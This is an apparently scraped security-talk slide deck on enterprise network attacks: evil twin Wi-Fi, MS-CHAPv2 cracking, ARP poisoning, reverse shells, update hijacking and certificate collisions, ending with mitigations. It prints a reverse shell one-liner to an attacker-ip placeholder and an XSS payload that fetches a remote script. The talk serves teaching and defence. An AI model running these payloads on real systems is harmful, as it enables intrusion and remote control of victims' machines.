Post on 13-Apr-2017
Enterprise Network Security
Navneet Kumar
Overview
• Demo• OSI Protocols Overview• Evil Twin Attack• Cryptanalysis : MS-CHAPv2• ARP poisoning• POST-MITM Attack vectors• Reverse Shell• Mitigations• Certificate Collision Attack
Note: Some Images in this presentation has been taken from web for illustration
SilverFish Worm
XSS
NPAPI runtime
Shell
<img src='a' onerror=eval(atob('JC5'))> = $.getScript('https://goo.gl/zByVrM')
masterPlugin.updatePlugin(“attacker-plugin”,success,failure)
Netcat Shell / ssh daemon / Bounjour
Hatching rate = ng
n=Average # of endpoints per meetingg=# of generation
g=0
g=1
g=2
802.11
ARP
Target Protocols
Attack Vectors
802.11
Evil twin attack
Fake Certificate Exchange
Soft AP
• Put WNIC in Master Mode and use Forged CA cert• Configure AP SSID to “bjn-int”• DAUTH to actual AP
Network
• Setup DNS• Setup DHCP
Routing
• Redirect 80,443 packets to proxy port• Forward traffic after NAT
Capture
• Use Same CA cert for signing• Sniff in proxy
Attack Setup
Note: Chrome uses certificate pinning for *.google.com
Fake BSSID
Highest Strength2.4 GHz Channel
Wireless Scan
Victim’s Client
WTF !!!
Certificate Forgery
Soft AP DHCP
Routing Proxy
Cryptanalysis of MS-CHAPv2
ChallengeHash = SHA1(random|| username)[0:8]
ChallengeHash
ChallengeResponse
Note: Original complexity analysis has been done by Moxie Marlinspike
Cryptanalysis of MS-CHAPv2
Note: Original complexity analysis has been done by Moxie Marlinspike
7 byte 7 byte 2 byte
Complexity = 256
time < 24 hrs ( 100% success )
ARP poisoning
POST-MITM Attack Vectors
Reverse Shell
Bind Shell
Session Hijacking
Above L3 Attacks
Reverse Bind Shell
• Give a network shell to attacker• Works Behind NAT• Gets Root Access
HOW ????
$ bash -i >& /dev/tcp/<attacker-ip>/5555 0>&1
https://tools.google.com/service/update2
https://swdl.bluejeans.com
https://aus4.mozilla.org/update/*/update.xml
smb://MVAV01/SophosUpdate
(Auto)Updates
Depl
oy P
aylo
ad w
ith u
pdat
es
Mitigation
Pre-deployment of enterprise wide CA
SSL Cert Pinning for updates
Proper WIPS Configuration
Arp Spoof Mitigations
Careful CA signing
Certificate Collision Attack
CADomainA
isCA?
CSR Ekey[Sha(csr.tbs)]
DomainAisCA?
DomainAisCA?
CertificateCSR.TBS
Sha( domainA.csr ) Sha( domainB.csr )
md5( domainA.csr )
md5( domainB.csr )
True
False
MD5 CollisionCertificate Collision